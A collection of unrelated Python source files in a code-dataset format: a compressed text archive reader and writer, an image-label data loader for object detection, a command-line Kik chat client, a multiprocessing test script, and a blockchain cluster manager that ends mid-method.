elif 'urlsf_subset' in f and f.endswith('_data.xz'):
assert not get_meta
yield from self.read_owt_subset(f)
elif f.endswith('.dat.zst'):
assert not get_meta
yield from self.read_dat(f)
elif f.endswith('.jsonl.zst'):
yield from self.read_jsonl(f, get_meta, jsonl_key=key)
elif f.endswith('.jsonl.zst.tar'):
yield from self.read_jsonl_tar(f, get_meta, jsonl_key=key)
elif f.endswith('.json.zst'):
assert not get_meta
yield from self.read_json(f)
elif f.endswith('.txt'):
assert not get_meta
yield from self.read_txt(f)
elif f.endswith('.zip'):
assert not get_meta
yield from self.read_zip(f)
elif f.endswith('.tar.gz'):
assert not get_meta
yield from self.read_tgz(f)
def read_txt(self, file):
with open(file, 'r') as fh:
yield fh.read()
def read_zip(self, file):
archive = ZipFile(file, 'r')
for f in archive.namelist():
yield archive.read(f).decode('UTF-8')
def read_tgz(self, file):
gz = gzip.open(file)
yield from (x.decode('utf-8') for x in tarfile_reader(gz, streaming=False))
def read_json(self, file):
with open(file, 'rb') as fh:
cctx = zstandard.ZstdDecompressor()
reader = cctx.stream_reader(fh)
ob = json.load(reader)
yield from ob
def read_dat(self, file):
with open(file, 'rb') as fh:
cctx = zstandard.ZstdDecompressor()
reader = cctx.stream_reader(fh)
while True:
ln = reader.read(16).decode('UTF-8')
if not ln:
break
ln = int(ln)
yield reader.read(ln).decode('UTF-8')
def read_jsonl(self, file, get_meta=False, autojoin_paragraphs=True, para_joiner='\n\n', key='text'):
with open(file, 'rb') as fh:
cctx = zstandard.ZstdDecompressor()
reader = io.BufferedReader(cctx.stream_reader(fh))
rdr = jsonlines.Reader(reader)
yield from handle_jsonl(rdr, get_meta, autojoin_paragraphs, para_joiner, key)
def read_jsonl_tar(self, file, get_meta=False, autojoin_paragraphs=True, para_joiner='\n\n', key='text'):
with open(file, 'rb') as fh:
for f in tarfile_reader(fh, streaming=True):
cctx = zstandard.ZstdDecompressor()
reader = io.BufferedReader(cctx.stream_reader(f))
rdr = jsonlines.Reader(reader)
yield from handle_jsonl(rdr, get_meta, autojoin_paragraphs, para_joiner, key)
f.close()
def read_owt(self, file):
tar = tarfile.open(file, encoding='utf-8')
utf8reader = codecs.getreader('utf-8')
for name in tar.getmembers():
fp = tar.extractfile(name)
inner_tar = tarfile.open(fileobj=fp, encoding='utf-8')
for inner_name in inner_tar.getmembers():
inner_fp = utf8reader(inner_tar.extractfile(inner_name))
contents = inner_fp.read()
yield contents
def read_owt_subset(self, file):
utf8reader = codecs.getreader('utf-8')
tar = tarfile.open(file, encoding='utf-8')
for name in tar.getmembers():
fp = utf8reader(tar.extractfile(name))
contents = fp.read()
yield contents
class Archive:
def __init__(self, out_dir, compression_level=3):
self.out_dir = out_dir
os.makedirs(out_dir, exist_ok=True)
self.i = 0
self.fh = open(self.out_dir + '/current_chunk_incomplete', 'wb')
self.cctx = zstandard.ZstdCompressor(level=compression_level, threads=8)
self.compressor = self.cctx.stream_writer(self.fh)
def add_data(self, data, meta={}):
self.compressor.write(json.dumps({'text': data, 'meta': meta}).encode('UTF-8') + b'\n')
def commit(self, archive_name='default'):
fname = self.out_dir + '/data_' + str(self.i) + '_time' + str(int(time.time())) + '_' + archive_name + '.jsonl.zst'
self.compressor.flush(zstandard.FLUSH_FRAME)
self.fh.flush()
self.fh.close()
os.rename(self.out_dir + '/current_chunk_incomplete', fname)
self.fh = open(self.out_dir + '/current_chunk_incomplete', 'wb')
self.compressor = self.cctx.stream_writer(self.fh)
self.i += 1
class DatArchive:
def __init__(self, out_dir):
self.out_dir = out_dir
os.makedirs(out_dir, exist_ok=True)
self.data = []
self.i = 0
if os.path.exists(out_dir) and len(os.listdir(out_dir)) > 0:
self.i = max(map(lambda x: int(x.split('_')[1].split('.')[0]), os.listdir(out_dir))) + 1
def add_data(self, data):
self.data.append(data)
def commit(self, archive_name=None):
# TODO: streaming
cctx = zstandard.ZstdCompressor(level=3)
if archive_name is None:
archive_name = str(int(time.time()))
res = b''.join(map(lambda x: ("%016d" % len(x)).encode('UTF-8') + x, map(lambda x: x.encode('UTF-8'), self.data)))
cdata = cctx.compress(res)
with open(self.out_dir + '/data_' + str(self.i) + '_' + archive_name + '.dat.zst', 'wb') as fh:
fh.write(cdata)
self.i += 1
self.data = []
class JSONArchive:
def __init__(self, out_dir):
self.out_dir = out_dir
os.makedirs(out_dir, exist_ok=True)
self.data = []
self.i = 0
if os.path.exists(out_dir) and len(os.listdir(out_dir)) > 0:
self.i = max(map(lambda x: int(x.split('_')[1].split('.')[0]), os.listdir(out_dir))) + 1
def add_data(self, data):
self.data.append(data)
def commit(self):
cctx = zstandard.ZstdCompressor(level=3)
cdata = cctx.compress(json.dumps(self.data).encode('UTF-8'))
with open(self.out_dir + '/data_' + str(self.i) + '_' + str(int(time.time())) + '.json.zst', 'wb') as fh:
fh.write(cdata)
self.i += 1
self.data = []
|
DataLoader1_ReadAll.py
|
from DataLoader.Helper.Helper_Global2Local import Global2Local
import threading
from Common.CommonClasses import *
from DataLoader.DataLoader0_ReadAnns import DataLoader0_ReadAnns
from DataLoader.DataVis import *
from DataLoader.Helper.Helper_TargetUnpacker import *
from Common.Calculation import Calculation
import time
class DataLoader1_ReadAll():
def __init__(self, start=0, N=1000):
self.beginAt = start
self.totalN = N#self.anns.N
self.initHelper()
def initHelper(self):
self.anns = DataLoader0_ReadAnns()
self.conv_g2l = Global2Local()
self.dataLabel = np.zeros(
(self.totalN, GridParams().numGridX, GridParams().numGridY, GridParams().numBBox, GridParams().dimFeat),
dtype=float)
self.imgList = np.zeros((self.totalN, 448, 448, 3), dtype=float)
def getDataLabelFromTo(self, start, partN):
end, N = getEnd(start, partN, self.totalN)
for i in range(start, end):
img, objIds, isMoreThanOneObjPerGrid, counter, label = self.anns.getTargetAt(i + self.beginAt)
self.imgList[i] = img
self.dataLabel[i,:] = label
# if np.mod(i, 100) == 0:
# print(i)
print("Done Reading imgs from %d to %d" %(start, end))
def getDataLable(self):
print("Allocating threads to read imgs")
partN = 500
#nThread = int(self.anns.N/partN) + 1
nThread = getNumThread(self.totalN, partN)
#print(nThread)
threads=[]
for i in range(0, nThread):
start = i*partN
threads.append(threading.Thread(target=self.getDataLabelFromTo, args=(start, partN)))
threads[i].start()
#print(i)
for thread in threads:
thread.join()
if __name__ == '__main__':
r = DataLoader0_ReadAnns()
visG = Visualizer_Global()
unpacker = TargetUnpacker()
c = Calculation()
reader = DataLoader1_ReadAll(1000, 1000)
s = time.time()
reader.getDataLable()
print(time.time() - s)
index = 150
img = reader.imgList[index].copy()
label = reader.dataLabel[index]
objIds, offset, bb = unpacker.unpackLabel(label)
print(label.shape)
fakebbs = np.ones_like(bb) * 5 + bb
iou = c.getIOU(fakebbs, bb)
img = visG.drawBBox(img, fakebbs, YOLOObjects().getNamesFromObjIds(objIds))
img = visG.drawBBox(img, bb, YOLOObjects().getNamesFromObjIds(objIds))
visG.showImg(img)
|
photon_client.py
|
#!/usr/bin/env python3
import logging
import sys
import threading
import time
import os
from kik_unofficial.datatypes.peers import Group, User
from kik_unofficial.client import KikClient
from kik_unofficial.callbacks import KikClientCallback
from kik_unofficial.datatypes.xmpp.chatting import IncomingChatMessage, IncomingGroupChatMessage, \
IncomingStatusResponse, IncomingGroupStatus
from kik_unofficial.datatypes.xmpp.roster import FetchRosterResponse, PeersInfoResponse
from kik_unofficial.datatypes.xmpp.login import ConnectionFailedResponse
username = sys.argv[1] if len(sys.argv) > 1 else input('Username: ')
password = sys.argv[2] if len(sys.argv) > 2 else input('Password: ')
friends = {}
users = {}
groups = []
dms = []
peer_jid = "0"
focus = False
class InteractiveChatClient(KikClientCallback):
def on_authenticated(self):
cli_thread = threading.Thread(target=chat)
cli_thread.start()
def on_roster_received(self, response: FetchRosterResponse):
print("Roster refreshed")
for peer in response.peers:
friends[peer.jid] = peer
for m in response.peers:
if isinstance(m, Group):
groups.append(str(m))
if isinstance(m, User):
dms.append(str(m))
def on_chat_message_received(self, chat_message: IncomingChatMessage):
print("[DM] {}: {}".format(jid_to_dm_username(chat_message.from_jid), chat_message.body))
"""client.send_chat_message(chat_message.from_jid,"hello")"""
time.sleep(1)
def on_group_message_received(self, chat_message: IncomingGroupChatMessage):
global peer_jid, focus
if chat_message.group_jid == peer_jid or focus is False:
try:
print("-------\n[GROUP]jid:{} - {}:\n{}: {}".format(get_group_jid_number(chat_message.group_jid),
friends[chat_message.group_jid].name,
jid_to_group_display_name(chat_message.from_jid),
chat_message.body))
except:
print(
"XXXXXXXXXXXXX\n[WARNING]UH OH, WE GOT A MESSAGE FROM A GROUP NOT IN THE ROSTER, UNLESS THE PROGRAM IS STARTING RUN /refresh\nXXXXXXXXXXXXX")
print("-------\n[GROUP]jid:{} - {}:\n{}: {}".format(get_group_jid_number(chat_message.group_jid),
"UNKNOWN GROUP",
jid_to_group_display_name(chat_message.from_jid),
chat_message.body))
else:
"""print("suppressed message from group ({}) {}".format(get_group_jid_number(chat_message.group_jid), friends[chat_message.group_jid].name))"""
def on_connection_failed(self, response: ConnectionFailedResponse):
print("Connection failed")
def on_status_message_received(self, response: IncomingStatusResponse):
print(response.status)
client.add_friend(response.from_jid)
def on_group_status_received(self, response: IncomingGroupStatus):
client.request_info_of_users(response.status_jid)
if response.status.find("has joined") > 0:
print("-------\n[JOIN]({}){} has joined the group ({})".format(response.status_jid,
jid_to_group_display_name(response.status_jid),
get_group_jid_number(response.group_jid)))
if response.status.find("has left") > 0:
print("-------\n[LEAVE]({}){} has left the group ({})".format(response.status_jid,
jid_to_group_display_name(response.status_jid),
get_group_jid_number(response.group_jid)))
def on_peer_info_received(self, response: PeersInfoResponse):
users[response.users[0].jid] = response.users[0]
def jid_to_dm_username(jid):
return jid.split('@')[0][0:-4]
def query_user(jid):
if jid in users:
return users[jid]
else:
client.request_info_of_users(jid)
while jid not in users:
pass
return users[jid]
def jid_to_group_display_name(jid):
return query_user(jid).display_name
def get_group_jid_number(jid):
return jid.split('@')[0][0:-2]
def chat():
global peer_jid, focus
print("Refreshing roster")
client.request_roster()
help_str = ("-Usage-\n\n" +
"/help - displays this message\n" +
"/connect [first letters of username/group jid] - Chat with peer\n" +
"/refresh - refreshes roster (if anyone has friended / added you to a group)\n" +
"/dms - list all dms you have open\n" +
"/groups - list all groups you have open\n" +
"/pic \"path to file.png\" - send a pic\n" +
"/focus - this makes only messages from the group your connected to appear\n" +
"/peer - list the peer you are currently connected to\n" +
"Type a line to send a message.\n")
print(help_str)
while True:
message = input()
if message.startswith('/'):
if message.startswith('/connect '):
for jid in friends:
if jid.startswith(message[9:]):
print("Chatting with {}".format(get_group_jid_number(jid)))
peer_jid = jid
break
elif message.startswith('/refresh'):
print("Refreshing roster")
client.request_roster()
elif message.startswith("/pic "):
client.send_chat_image(peer_jid, message[6:-1])
elif message.startswith("/focus"):
focus = not focus
print("focus: " + str(focus))
elif message.startswith("/peer"):
print(peer_jid)
elif message.startswith("/help"):
print(help_str)
elif message.startswith("/dms"):
print("-DMS-\n{}".format("\n".join([m for m in dms])))
elif message.startswith("/groups"):
groups_str = "-GROUPS-"
for g in groups:
groups_str += "\n[GROUP]jid:" + g.split("_")[0][10:] + " - " + g.split("name=")[1].split(", code=")[
0]
print(groups_str)
else:
if peer_jid != "0" and message:
client.send_chat_message(peer_jid, message)
elif message is None:
pass
else:
print("you need to connect to someone first, use /connect [name/jid]")
if __name__ == '__main__':
# set up logging
logger = logging.getLogger()
logger.setLevel(logging.INFO)
stream_handler = logging.FileHandler(os.path.dirname(__file__) + '/' + str(int(time.time() * 1000.0)) + '.log')
stream_handler.setFormatter(logging.Formatter(KikClient.log_format()))
logger.addHandler(stream_handler)
# create the client
callback = InteractiveChatClient()
client = KikClient(callback=callback, kik_username=username, kik_password=password)
while True: pass
|
multiprocTest.py
|
from time import sleep
def TestFunction( test1, test2 ):
print( 'these are the props', test1, test2)
while True:
print( 'we are looping' )
sleep(1)
return
if __name__ == "__main__":
import multiprocessing
proc = multiprocessing.Process(target=TestFunction, args=({'test':1, 'test2':2}))
proc.name = 'proc 1'
proc.start()
sleep(5)
print( proc.name)
# Terminate the process
proc.terminate() # sends a SIGTERM
while True:
try:
var = input(""" What do you want to do?: """
)
print( var )
if var == 'q':
print( 'do we raise exception??')
thread.raise_exception()
except KeyboardInterrupt:
break
print( 'finished')
|
cluster.py
|
# Copyright IBM Corp, All Rights Reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
import datetime
import logging
import os
import sys
import time
import copy
from threading import Thread
import requests
from pymongo.collection import ReturnDocument
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
from agent import get_swarm_node_ip
from common import db, log_handler, LOG_LEVEL
from common import CLUSTER_PORT_START, CLUSTER_PORT_STEP, \
NETWORK_TYPE_FABRIC_PRE_V1, NETWORK_TYPE_FABRIC_V1, \
CONSENSUS_PLUGINS_FABRIC_V1, CONSENSUS_MODES, \
WORKER_TYPES, WORKER_TYPE_DOCKER, WORKER_TYPE_SWARM, WORKER_TYPE_K8S, \
SYS_CREATOR, SYS_DELETER, SYS_USER, SYS_RESETTING, \
NETWORK_SIZE_FABRIC_PRE_V1, \
PEER_SERVICE_PORTS, CA_SERVICE_PORTS
from common import FabricPreNetworkConfig, FabricV1NetworkConfig
from modules import host
from agent import ClusterOnDocker
logger = logging.getLogger(__name__)
logger.setLevel(LOG_LEVEL)
logger.addHandler(log_handler)
class ClusterHandler(object):
""" Main handler to operate the cluster in pool
"""
def __init__(self):
self.col_active = db["cluster_active"]
self.col_released = db["cluster_released"]
self.host_handler = host.host_handler
self.cluster_agents = {
'docker': ClusterOnDocker(),
'swarm': ClusterOnDocker()
}
def list(self, filter_data={}, col_name="active"):
""" List clusters with given criteria
:param filter_data: Image with the filter properties
:param col_name: Use data in which col_name
:return: list of serialized doc
"""
result = []
if col_name == "active":
logger.debug("List all active clusters")
result = list(map(self._serialize, self.col_active.find(
filter_data)))
elif col_name == "released":
logger.debug("List all released clusters")
result = list(map(self._serialize, self.col_released.find(
filter_data)))
else:
logger.warning("Unknown cluster col_name=" + col_name)
return result
def get_by_id(self, id, col_name="active"):
""" Get a cluster for the external request
:param id: id of the doc
:param col_name: collection to check
:return: serialized result or obj
"""
if col_name != "released":
# logger.debug("Get a cluster with id=" + id)
cluster = self.col_active.find_one({"id": id})
else:
# logger.debug("Get a released cluster with id=" + id)
cluster = self.col_released.find_one({"id": id})
if not cluster:
logger.warning("No cluster found with id=" + id)
return {}
return self._serialize(cluster)
def create(self, name, host_id, config, start_port=0,
user_id=""):
""" Create a cluster based on given data
TODO: maybe need other id generation mechanism
Args:
name: name of the cluster
host_id: id of the host URL
config: network configuration
start_port: first service port for cluster, will generate
if not given
user_id: user_id of the cluster if start to be applied
return: Id of the created cluster or None
"""
logger.info("Create cluster {}, host_id={}, config={}, start_port={}, "
"user_id={}".format(name, host_id, config.get_data(),
start_port, user_id))
worker = self.host_handler.get_active_host_by_id(host_id)
if not worker:
return None
if len(worker.get("clusters")) >= worker.get("capacity"):
logger.warning("host {} is already full".format(host_id))
return None
worker_api = worker.get("worker_api")
logger.debug("worker_api={}".format(worker_api))
if start_port <= 0:
ports = self.find_free_start_ports(host_id, 1)
if not ports:
logger.warning("No free port is found")
return None
start_port = ports[0]
peer_mapped_ports, ca_mapped_ports, mapped_ports = {}, {}, {}
for k, v in PEER_SERVICE_PORTS.items():
peer_mapped_ports[k] = v - PEER_SERVICE_PORTS['rest'] + start_port
for k, v in CA_SERVICE_PORTS.items():
ca_mapped_ports[k] = v - PEER_SERVICE_PORTS['rest'] + start_port
mapped_ports.update(peer_mapped_ports)
mapped_ports.update(ca_mapped_ports)
logger.debug("mapped_ports={}".format(mapped_ports))
network_type = config['network_type']
net = { # net is a blockchain network instance
'id': '',
'name': name,
'user_id': user_id or SYS_CREATOR, # avoid applied
'host_id': host_id,
'worker_api': worker_api,
'network_type': network_type, # e.g., fabric-1.0
'create_ts': datetime.datetime.now(),
'apply_ts': '',
'release_ts': '',
'status': 'running',
'containers': [],
'duration': '',
'health': ''
}
if network_type == NETWORK_TYPE_FABRIC_V1: # TODO: fabric v1.0
net.update({
'mapped_ports': mapped_ports,
'service_url': {}, # e.g., {rest: xxx:7050, grpc: xxx:7051}
})
elif network_type == NETWORK_TYPE_FABRIC_PRE_V1: # fabric v0.6
net.update({
'mapped_ports': mapped_ports,
'service_url': {}, # e.g., {rest: xxx:7050, grpc: xxx:7051}
})
net.update(config.get_data())
uuid = self.col_active.insert_one(net).inserted_id # object type
cid = str(uuid)
self.col_active.update_one({"_id": uuid}, {"$set": {"id": cid}})
# try to start one cluster at the host
worker = self.host_handler.db_update_one(
{"id": host_id}, {"$addToSet": {"clusters": cid}})
if not worker or len(worker.get("clusters")) > worker.get("capacity"):
self.col_active.delete_one({"id": cid})
self.host_handler.db_update_one({"id": host_id},
{"$pull": {"clusters": cid}})
return None
# from now on, we should be safe
# start compose project, failed then clean and return
logger.debug("Start compose project with name={}".format(cid))
containers = self.cluster_agents[worker.get('type')]\
.create(cid, mapped_ports, worker, config=config, user_id=user_id)
if not containers:
logger.warning("failed to start cluster={}, then delete"
.format(name))
self.delete(id=cid, record=False, forced=True)
return None
access_peer, access_ca = '', ''
if network_type == NETWORK_TYPE_FABRIC_V1: # fabric v1.0
access_peer = 'peer0.org1.example.com'
access_ca = 'ca.example.com'
elif network_type == NETWORK_TYPE_FABRIC_PRE_V1: # fabric v0.6
access_peer = 'vp0'
access_ca = 'membersrvc'
peer_host_ip = self._get_service_ip(cid, access_peer)
ca_host_ip = self._get_service_ip(cid, access_ca)
# no api_url, then clean and return
if not peer_host_ip: # not valid api_url
logger.error("Error to find peer host url, cleanup")
self.delete(id=cid, record=False, forced=True)
return None
service_urls = {}
for k, v in peer_mapped_ports.items():
service_urls[k] = "{}:{}".format(peer_host_ip, v)
for k, v in ca_mapped_ports.items():
service_urls[k] = "{}:{}".format(ca_host_ip, v)
# update api_url, container, and user_id field
self.db_update_one(
{"id": cid},
{"$set": {"containers": containers, "user_id": user_id,
'api_url': service_urls['rest'],
'service_url': service_urls}})
def check_health_work(cid):
time.sleep(5)
self.refresh_health(cid)
t = Thread(target=check_health_work, args=(cid,))
t.start()
logger.info("Create cluster OK, id={}".format(cid))
return cid
def delete(self, id, record=False, forced=False):
""" Delete a cluster instance
Clean containers, remove db entry. Only operate on active host.
:param id: id of the cluster to delete
:param record: Whether to record into the released collections
:param forced: Whether to removing user-using cluster, for release
:return:
"""
logger.debug("Delete cluster: id={}, forced={}".format(id, forced))
c = self.db_update_one({"id": id}, {"$set": {"user_id": SYS_DELETER}},
after=False)
if not c:
logger.warning("Cannot find cluster {}".format(id))
return False
# we are safe from occasional applying now
user_id = c.get("user_id") # original user_id
if not forced and user_id != "" and not user_id.startswith(SYS_USER):
# not forced, and chain is used by normal user, then no process
logger.warning("Cannot delete cluster {} by "
"user {}".format(id, user_id))
self.col_active.update_one({"id": id},
{"$set": {"user_id": user_id}})
return False
# 0. forced
# 1. user_id == SYS_DELETER or ""
# Then, add deleting flag to the db, and start deleting
if not user_id.startswith(SYS_DELETER):
self.col_active.update_one(
{"id": id},
{"$set": {"user_id": SYS_DELETER + user_id}})
host_id, worker_api, network_type, consensus_plugin, cluster_size = \
c.get("host_id"), c.get("worker_api"), \
c.get("network_type", NETWORK_TYPE_FABRIC_PRE_V1), \
c.get("consensus_plugin", CONSENSUS_PLUGINS_FABRIC_V1[0]), \
c.get("size", NETWORK_SIZE_FABRIC_PRE_V1[0])
# port = api_url.split(":")[-1] or CLUSTER_PORT_START
h = self.host_handler.get_active_host_by_id(host_id)
if not h:
logger.warning("Host {} inactive".format(host_id))
self.col_active.update_one({"id": id},
{"$set": {"user_id": user_id}})
return False
if network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(consensus_plugin=consensus_plugin,
size=cluster_size)
elif network_type == NETWORK_TYPE_FABRIC_PRE_V1:
config = FabricPreNetworkConfig(consensus_plugin=consensus_plugin,
consensus_mode='',
size=cluster_size)
else:
return False
if not self.cluster_agents[h.get('type')].delete(id, worker_api,
config):
logger.warning("Error to run compose clean work")
self.col_active.update_one({"id": id},
{"$set": {"user_id": user_id}})
return False
self.host_handler.db_update_one({"id": c.get("host_id")},
{"$pull": {"clusters": id}})
self.col_active.delete_one({"id": id})
if record: # record original c into release collection
logger.debug("Record the cluster info into released collection")
c["release_ts"] = datetime.datetime.now()
c["duration"] = str(c["release_ts"] - c["apply_ts"])
# seems mongo reject timedelta type
if user_id.startswith(SYS_DELETER):
c["user_id"] = user_id[len(SYS_DELETER):]
self.col_released.insert_one(c)
return True
def delete_released(self, id):
""" Delete a released cluster record from db
:param id: id of the cluster to delete
:return: True or False
"""
logger.debug("Delete cluster: id={} from release records.".format(id))
self.col_released.find_one_and_delete({"id": id})
return True
def apply_cluster(self, user_id, condition={}, allow_multiple=False):
""" Apply a cluster for a user
:param user_id: which user will apply the cluster
:param condition: the filter to select
:param allow_multiple: Allow multiple chain for each tenant
:return: serialized cluster or None
"""
if not allow_multiple: # check if already having one
filt = {"user_id": user_id, "release_ts": "", "health": "OK"}
filt.update(condition)
c = self.col_active.find_one(filt)
if c:
logger.debug("Already assigned cluster for " + user_id)
return self._serialize(c)
logger.debug("Try find available cluster for " + user_id)
hosts = self.host_handler.list({"status": "active",
"schedulable": "true"})
host_ids = [h.get("id") for h in hosts]
logger.debug("Find active and schedulable hosts={}".format(host_ids))
for h_id in host_ids: # check each active and schedulable host
filt = {"user_id": "", "host_id": h_id, "health": "OK"}
filt.update(condition)
c = self.db_update_one(
filt,
{"$set": {"user_id": user_id,
"apply_ts": datetime.datetime.now()}})
if c and c.get("user_id") == user_id:
logger.info("Now have cluster {} at {} for user {}".format(
c.get("id"), h_id, user_id))
return self._serialize(c)
logger.warning("Not find matched available cluster for " + user_id)
return {}
def release_cluster_for_user(self, user_id):
""" Release all cluster for a user_id.
:param user_id: which user
:return: True or False
"""
logger.debug("release clusters for user_id={}".format(user_id))
c = self.col_active.find({"user_id": user_id, "release_ts": ""})
cluster_ids = list(map(lambda x: x.get("id"), c))
logger.debug("clusters for user {}={}".format(user_id, cluster_ids))
result = True
for cid in cluster_ids:
result = result and self.release_cluster(cid)
return result
def release_cluster(self, cluster_id, record=True):
""" Release a specific cluster.
Release means delete and try best to recreate it with same config.
:param cluster_id: specific cluster to release
:param record: Whether to record this cluster to release table
:return: True or False
"""
c = self.db_update_one(
{"id": cluster_id},
{"$set": {"release_ts": datetime.datetime.now()}})
if not c:
logger.warning("No cluster find for released with id {}".format(
cluster_id))
return True
if not c.get("release_ts"): # not have one
logger.warning("No cluster can be released for id {}".format(
cluster_id))
return False
return self.reset(cluster_id, record)
def start(self, cluster_id):
"""Start a cluster
:param cluster_id: id of cluster to start
:return: Bool
"""
c = self.get_by_id(cluster_id)
if not c:
logger.warning('No cluster found with id={}'.format(cluster_id))
return False
h_id = c.get('host_id')
h = self.host_handler.get_active_host_by_id(h_id)
if not h:
logger.warning('No host found with id={}'.format(h_id))
return False
network_type = c.get('network_type')
if network_type == NETWORK_TYPE_FABRIC_PRE_V1:
config = FabricPreNetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
consensus_mode=c.get('consensus_mode'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
else:
return False
result = self.cluster_agents[h.get('type')].start(
name=cluster_id, worker_api=h.get('worker_api'),
mapped_ports=c.get('mapped_ports', PEER_SERVICE_PORTS),
log_type=h.get('log_type'),
log_level=h.get('log_level'),
log_server='',
config=config,
)
if result:
self.db_update_one({"id": cluster_id},
{"$set": {'status': 'running'}})
return True
else:
return False
def restart(self, cluster_id):
"""Restart a cluster
:param cluster_id: id of cluster to start
:return: Bool
"""
c = self.get_by_id(cluster_id)
if not c:
logger.warning('No cluster found with id={}'.format(cluster_id))
return False
h_id = c.get('host_id')
h = self.host_handler.get_active_host_by_id(h_id)
if not h:
logger.warning('No host found with id={}'.format(h_id))
return False
network_type = c.get('network_type')
if network_type == NETWORK_TYPE_FABRIC_PRE_V1:
config = FabricPreNetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
consensus_mode=c.get('consensus_mode'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
else:
return False
result = self.cluster_agents[h.get('type')].restart(
name=cluster_id, worker_api=h.get('worker_api'),
mapped_ports=c.get('mapped_ports', PEER_SERVICE_PORTS),
log_type=h.get('log_type'),
log_level=h.get('log_level'),
log_server='',
config=config,
)
if result:
self.db_update_one({"id": cluster_id},
{"$set": {'status': 'running'}})
return True
else:
return False
def stop(self, cluster_id):
"""Stop a cluster
:param cluster_id: id of cluster to stop
:return: Bool
"""
c = self.get_by_id(cluster_id)
if not c:
logger.warning('No cluster found with id={}'.format(cluster_id))
return False
h_id = c.get('host_id')
h = self.host_handler.get_active_host_by_id(h_id)
if not h:
logger.warning('No host found with id={}'.format(h_id))
return False
network_type = c.get('network_type')
if network_type == NETWORK_TYPE_FABRIC_PRE_V1:
config = FabricPreNetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
consensus_mode=c.get('consensus_mode'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
else:
return False
result = self.cluster_agents[h.get('type')].stop(
name=cluster_id, worker_api=h.get('worker_api'),
mapped_ports=c.get('mapped_ports', PEER_SERVICE_PORTS),
log_type=h.get('log_type'),
log_level=h.get('log_level'),
log_server='',
config=config,
)
if result:
self.db_update_one({"id": cluster_id},
{"$set": {'status': 'stopped', 'health': ''}})
return True
else:
return False
def reset(self, cluster_id, record=False):
"""
Force to reset a chain.
Delete it and recreate with the same configuration.
:param cluster_id: id of the reset cluster
:param record: whether to record into released db
:return:
"""
c = self.get_by_id(cluster_id)
logger.debug("Run recreate_work in background thread")
cluster_name, host_id, mapped_ports, network_type, \
= \
c.get("name"), c.get("host_id"), \
c.get("mapped_ports"), c.get("network_type")
if not self.delete(cluster_id, record=record, forced=True):
logger.warning("Delete cluster failed with id=" + cluster_id)
return False
network_type = c.get('network_type')
if network_type == NETWORK_TYPE_FABRIC_PRE_V1:
config = FabricPreNetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
consensus_mode=c.get('consensus_mode'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
else:
return False
if not self.create(name=cluster_name, host_id=host_id,
start_port=mapped_ports['rest'], config=config):
logger.warning("Fail to recreate cluster {}".format(cluster_name))
return False
return True
def reset_free_one(self, cluster_id):
"""
Reset some free chain, mostly because it's broken.
:param cluster_id: id to reset
:return: True or False
"""
logger.debug("Try reseting cluster {}".format(cluster_id))
c = self.db_update_one({"id": cluster_id, "user_id": ""},
{"$set": {"user_id": SYS_RESETTING}})
if c.get("user_id") != SYS_RESETTING: # not have one
logger.warning("No free cluster can be reset for id {}".format(
cluster_id))
return False
return self.reset(cluster_id)
def _serialize(self, doc, keys=('id', 'name', 'user_id', 'host_id',
'network_type',
'consensus_plugin',
'consensus_mode', 'worker_api',
'create_ts', 'apply_ts', 'release_ts',
'duration', 'containers', 'size', 'status',
'health', 'mapped_ports', 'service_url')):
""" Serialize an obj
:param doc: doc to serialize
:param keys: filter which key in the results
:return: serialized obj
"""
result = {}
if doc:
for k in keys:
result[k] = doc.get(k, '')
return result
def _get_service_ip(self, cluster_id, node='vp0'):
"""
:param cluster_id: The name of the cluster
:param host: On which host to search the cluster
:param node: name of the cluster node
:return: service IP or ""
"""
host_id = self.get_by_id(cluster_id).get("host_id")
host = self.host_handler.get_by_id(host_id)
if not host:
logger.warning("No host found with cluster {}".format(cluster_id))
return ""
worker_api, host_type = host.get('worker_api'), host.get('type')
if host_type not in WORKER_TYPES:
logger.warning("Found invalid host_type=%s".format(host_type))
return ""
# we should diff with simple host and swarm host here
if host_type == WORKER_TYPE_DOCKER: # single
segs = worker_api.split(":") # tcp://x.x.x.x:2375
if len(segs) != 3:
logger.error("Invalid daemon url = ", worker_api)
return ""
host_ip = segs[1][2:]
logger.debug("single host, ip = {}".format(host_ip))
elif host_type == WORKER_TYPE_SWARM: # swarm
host_ip = get_swarm_node_ip(worker_api, "{}_{}".format(
cluster_id, node))
logger.debug("swarm host, ip = {}".format(host_ip))
else:
logger.error("Unknown host type = {}".format(host_type))
host_ip = ""
return host_ip
def find_free_start_ports(self, host_id, number):
""" Find the first available port for a new cluster api
This is NOT lock-free. Should keep simple, fast and safe!
Check existing cluster records in the host, find available one.
:param host_id: id of the host
:param number: Number of ports to get
:return: The port list, e.g., [7050, 7150, ...]
"""
logger.debug("Find {} start ports for host {}".format(number, host_id))
if number <= 0:
logger.warning("number {} <= 0".format(number))
return []
if not self.host_handler.get_by_id(host_id):
logger.warning("Cannot find host with id={}", host_id)
return ""
clusters_exists = self.col_active.find({"host_id": host_id})
clusters_valid = list(filter(lambda c: c.get("service_url"),
clusters_exists))
ports_existed = list(map(
lambda c: int(c["service_url"]["rest"].split(":")[-1]),
clusters_valid))
logger.debug("The ports existed: {}".format(ports_existed))
if len(ports_existed) + number >= 1000:
logger.warning("Too much ports are already in used.")
return []
candidates = [CLUSTER_PORT_START + i * CLUSTER_PORT_STEP
for i in range(len(ports_existed) + number)]
result = list(filter(lambda x: x not in ports_existed, candidates))
logger.debug("Free ports are {}".format(result[:number]))
return result[:number]
def refresh_health(self, cluster_id, timeout=5):
"""
